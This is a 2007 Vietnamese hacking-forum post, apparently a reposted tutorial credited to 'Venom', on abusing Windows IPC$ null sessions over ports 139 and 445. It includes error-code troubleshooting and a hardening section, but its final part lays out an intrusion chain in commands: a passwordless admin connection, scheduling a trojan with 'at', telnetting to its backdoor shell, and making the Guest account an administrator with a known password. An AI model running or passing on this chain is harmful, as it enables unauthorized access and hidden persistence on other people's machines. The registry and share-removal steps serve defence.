Bài cũ: Cơ Bản Ipc$ TG:Venom

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

Bài cũ: Cơ Bản Ipc$ TG:Venom

[Article] Bài cũ: Cơ Bản Ipc$ TG:Venom	08/01/2007 23:57:56 (+0700) \| #1 \| 35045

komodo01
Member

Joined: 08/01/2007 07:01:49
Messages: 24
Offline

Tac gia : Venom

Lời nói đầu :

những bài viết về IPC$...trên Net nhiều vô số kể...và đươg nhiên không nhiều kiêt tác....nhưng cách thức tân công cũng được bàn bạc khá nhiều..vì thế...không còn ai chịu viết thêm về IPC rỗng nữa...tuy nhiên....tớ cho rằng những bài viết trước đây không đủ chi tiết......đối với các Newbie mơí bắt đầu tiếp xúc vói IPC$...và những bước nói lước về IPC$ rỗng...không thể nào giải đáp hết những tò mò của Newbie ( bạn có thể tham gia các Forums để coi nhũng gì tới nói có đúng không ? ) vì thế...tớ viết bài này hi vọng sẽ giải đáp được các thắc mắc của Newbie......

Phần 1 : IPC$ là gì ?

IPC$ từ viết tắc của Internet Process Connection là một tài nguyên Share.....các bạn có thể thông qua ID và PW để có được quyền Hạng tương ứng.....

lỡi dụng ĩPC$....Hackers có thể Kết nối một IPC$ rỗng với máy đích mà không cần PW của User ( tất nhiên...máy đích phải có một Ipc$ rỗng...nếu không thi bãn không thê Connected )....và còn có thể lợi dũng IPC$ rỗng này để lấy được danh sách của đối phương

chúng ta thường nói lổ hổng IPC$ lổ hổng IPC$...thật ra thì IPC$ này không phải một lổ hổng thứ thiệt....nó đuợc thiết kế cho các Admin có thể truy cập máy tính từ xa......tức là những ổ Logic ( C$,D$,E$ ) và các Mục lục hệ thống Windows ( Admin$ )....tất cả các thứ trên.... bắt đầu với mục đích convenience cho các Adminstrator....nhưng nhưng cái này chưa chắc là tốt thật sự....có một số người lại lợi dụng IPC$ để * phỏng Vấn * các tài nguyên Share trên hệ thống...đánh cấp các danh sách của User....tiến hành * Đoán Mò * passwords.....hoặc là Cracking ...hi vọng sẽ Đoạt được quyền tối cao trên máy tính...và tiến hành các cuộc chơi không ai rõ mục đích..........

ANSWER A RIDDLE

1. IPC là một chức năng login từ xa của Windows NT ( hoặc là các phiên bản Win 2k XP )...tính năng này tương đương với chức năng Telnet của Unix....vì tính năng IPC$ phải dùng đến các tham số files DLL của Windows NT...vì thê không thể Chạy trên Winddows 9x.........
có thể nói là chỉ có WinNT/2k/Xp mới có thể tạo một Kết nối IPC$.....98/Me không thể làm được việc này ( nhưng có một số bạn nói với tui là trong win98 cũng có thể làm được...không biết thật hay giả...dù là thật hay giả đi nữa...bây giờ là năm 2003 rồi...đề nghị các cậu sử dũng win98 nâng cấp hệ thông đi giùm ()

2. tạo kết nồi IPC$ không chắc chắn thành công 100%..nếu đối phương khoá share IPC$..thì bồ không tạo đuợc IPC$ rỗng

3. tớ không nói là sau khi tạo đựơc một IPC$ rỗng là bồ có thể View dành sách của User trên Server đó...vì Adminstrator có thể khoá tính năng view danh sách User....
----------------------------------------------------------------------------------
Phần 2 : Tác dụng của IPC$ trong các cuộc tấn công Hack

tớ đã nói ở trên rồi...khi chúng ta có một IPC$ rỗng...cậu có thể lấy được không ít thông tin ( những thông tin không thể thiếu khi Hack ) hỏi tham các ổ Share...nếu bạn có thể login với một User có quyền hạng..hêhê....không cần nói nữa rồi...............What you Want...you can do.....!!!!!!

nhưng bồ đừng có vui mừng quá sớm...tưởng passwords của Adminstrators dể lấy lắm hả ? tuy nhiên...có một số Adminstrator ngu ...muốn đánh lừa chúng ta bằng cách không đạt password cho IPC$ hoặc là setup password rất * khôn *...( giống thằng Admin khùng ở Dv rần nhà tui ) nhưng đây chỉ là tiểu số..bây giờ đâu như ngày xưa...tuy theo kiến thức bảo mật của người dùng củng nâng cao...và Admin ngày càng cáo già....Hack password ngày càng khó khăn...

có thể không lau nữa...chúng ta phải tiến hành kết nối với quyền hạng cực nhỏ hoặc là không có quyền hạng ...từ từ rồi bạn sẽ thấy link vớ IPC$ không phài là vạn năng..thậm chí lúc server không mở IPC$ rỗng...cậu không tài nào link đến nữa......vì thế...tớ cho rằng mấy bồ dùng IPC$ rỗng làm vũ khí tấn công..nò giống như cách chuyền bóng trên sân cỏ...rất khó có một đòn chí mạng....nhưng lại không thể thiếu......
---------------------------------------------------------------------------------
Phần 3 : IPC$ rỗng....port 139,445......

1. IPC$ và link rỗng

không dùng user và password để Connected là link rỗng...ngược lài...nếu bạn dùng User & Passwords để Login thì nó không phải là một kết nồi IPC$ rỗng
có rất nhiều người sẽ hỏi....nếu có thể kết nối ĩPC$ rỗng..thế thi sau này tui cứ làm thế là được rồi....tội gì mà phải đi Scan port...Cracking passwords...hêhê...nguyên nhân tớ đã nói từ đầu bài rồi.....khi bạn login bằng link rỗng...bàn không có quyền hạng gì trong hệ thống ( chán chết )...nếu bạn login bằng quyền Hạng user hoặc Admin thì bồ có quyền hạng tương ứng.......( có thể nắm quyền thì ai không khoái....? vì thế..nên tích cực làm việc đi....)

2. IPC$ & Port 139,445

kết nối IPC$ có thể thực hiện login từ xa và share tài nguyên...còn việc open port 139 là Agreement của ứng dụng....chúng ta có thể thông qua port 139 ,445 ( Win2000) để thực hiện việc share files.....vì thế....nói cách đơn giản thi IPC$ phài có port 139, 445 để support
-------------------------------------------------------------------------------------------------
Phần 4 : nguyên nhân thất bại về link IPC$

sau đây là 5 nguyên nhân thường gặp nhất :

1. hệ thống của bạn không phải là NT hoặc là hệ thông cao cấp hơn
2. ối phương không có thiệt lập IPC$
3. máy đối phương chưa open port 135...445 ( hoặc bị dính firewall )
4.rõ không đúng lệnh
5. sai user & password ( nếu kết nối link rỗng thì không tính )

ngoài ra...bạn có thể căn cừ theo phản hồi của error để phân tích nguyên nhân.....

error 5 : từ chối phỏng vấn....có thể bạn không login bằng tư cách của user hoặc Admin...
error 51 : Windows không tài nào tìm được đường dẫn.....Netword có vấn đề
error 53 : tìm không thấy đường dẫn network : sai IP...mục tiêu chưa mở máy.....server Lanmanserver chưa khởi động...mục tiêu có setup firewall
error 67 : tìm không thây netword name.....Lanmanworkstation của you chưa khởi động..: mục tiêu đã del ĩPC$
error 1219 : bạn đã kết nối 1 IPC$ rồi...không thể kết nối 2 cái
error 1326 : chưa biết rỏ user và passwords...
error 1792 : Server Netlogon của mục tiêu chưa khởi động
error 2242 : user và password đã qua hạng

vấn để kết nối IPC$ thất bãi còn rất nhiều...trừ những nguyên nhân trên..còn một số tớ cũng không rỏ nửa...chỉ có ước các bồ tự tìm hiểu nghe.................
--------------------------------------------------------------------------------------------
Phần 5 : làm thế nào để open IPC$ của mục tiêu ?

trước tiên...cậu cần có một shell không ỷ lại vào IPC$...vd phần mở rộng CMD của SQL...Telnet....Trojan.....đương nhiên...Shell này phải có quyền hạng của Admin.....sau đó...bạn có thể dùng shell để run net share IPC$ để open IPC$ của mục tiêu....trong những cái trên...chúng ta có thể biết đuợc....có thể dùng đuợc IPC$ hay không còn cần phải có nhiều điều kiện khác nhau...cần sát định Correlated của server đả khởi động rồi ? nếu không thì cầu cần open nó.... ( không biết làm thế nào thì coi bài viết của tớ trên diền đàn..)...nếu không được nữa ( dính Firewall ) tớ đề nghị bỏ cuộc.
---------------------------------------------------------------------------------------------
Phần 6 : làm thế nào đề phòng xâm nhập bằng IPC$

1. cấm không cho tiến hành kềt nối rỗng ( thao tác này không thể ngăn cản thiết lập kết nối rỗng....hơi mâu thuẫn )
đầu tiên...bạn run Regedit.....kiếm hàng[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] xửa giá trĩ của RestrictAnonymous = DWORD thành : 00000001

2. cấm không cho share
1) check tài nguyên share
run cmd gỏ vào net share

2) del share
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（nếu như là e,f thì có thể del tiếp )

3)stop phụ vụ server
net stop server /y

4) sửa đổi Reg
run Regedit...
trong bản server : kiếm hàng sau đây [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]đem giá tri hàng Autoshareserver ( DWORD ) sữa thành : 00000000.

trong bản pro : kiếm hàng [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] đem giá trị của hàng AutoshareWks ( DWORD ) thành : 00000000.

nếu những gì nói trên không tòn tại...thì bạn phải tạo thôi.................

2. cài đặt firewall

3.thiết lập một passwords phứt tạp thật phứt tạp...không cho hackers thông qua IPC$ để Cracking passwords
-----------------------------------------------------------------
Phần 7 : những lệnh liên quan

1)kết nối rỗng :
Net use \\ip\ipc$ ""/user:"" ( chú ý : dòng lệnh này có 3 ô trống )

2) không kết nối rỗng :
Net use \\ip\ipc$ "user" /user:"password" ( có 3 ô )

3)Approval share :
Net use z: \\ip\c$ "password" /user:"user"

4)del link IPC$
Net use \\ip\ipc$ /del

5)del share
Net use c: /del
Net use * /del ( del toàn bô share )
--------------------------------------------------------------------------------------------------------
phần 8 :

những cách sau đấy không có gì gọi là đặt biệt..nhưng chắc vẫn có nhiều bạn chưa biết...nến tờ viết luôn vậy

1) C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
Scan đuợc user là Adminstrator.....không có passwors...nếu bạn tính tấn công thì có thể dùng lệnh này thiết lập một link với 127.0.0.1...tại vì không có passwords..vài thế....dấu "" không càn gõ.......cò dấu "" sau là tên của user...chỉ cần gõ vào Adminstrator là xong....

2) C:\>net time \\127.0.0.1
check time...nếu phât hiện thới gian của 127.0.0.1 là 2003/6/19 11:00 AM là coi như lệnh thành công

3) C:\>at \\127.0.0.1 11:05 srv.exe
sữ dũng lệnh At để khởi động trojan.....................

4) C:\>telnet 127.0.0.1 99
bây giờ phải dùnd đến lệnh Telnet rồi....port mặc định của Telnet là 23....chúng ta đã copy Srv.exe lên máy victim..để thiết lập mốt shell với port 99..............

cho chắc an......chúng ta đưa Guest lên nhóm Admintrator
5)C:\>net user guest /active:yes
kích hoạt Guest

6)C:\>net user guest 1234
sữa đổi passwords của Guest thành 1234

7)C:\>net localgroup administrators guest /add
biến Guest thành Adminstrator
----------------------------------------------------------
tới thấy mính nói quá nhiều về IPC$ rồi đấy...tới nồi tớ cũng thấy là mình táo lao quá......những gì tớ kể trên...nếu bạn nào thấy không hợp lý thì chúng ta có thể thảo luận nhau...để cùng tiến bộ...

cuối cùng tớ không khiếu khích các cậu tiến hành xâm nhập...phá hoại......hi vọng là mấy bồ hiểu cho......

Bài viết : Venom

Go to:

Users currently in here
1 Anonymous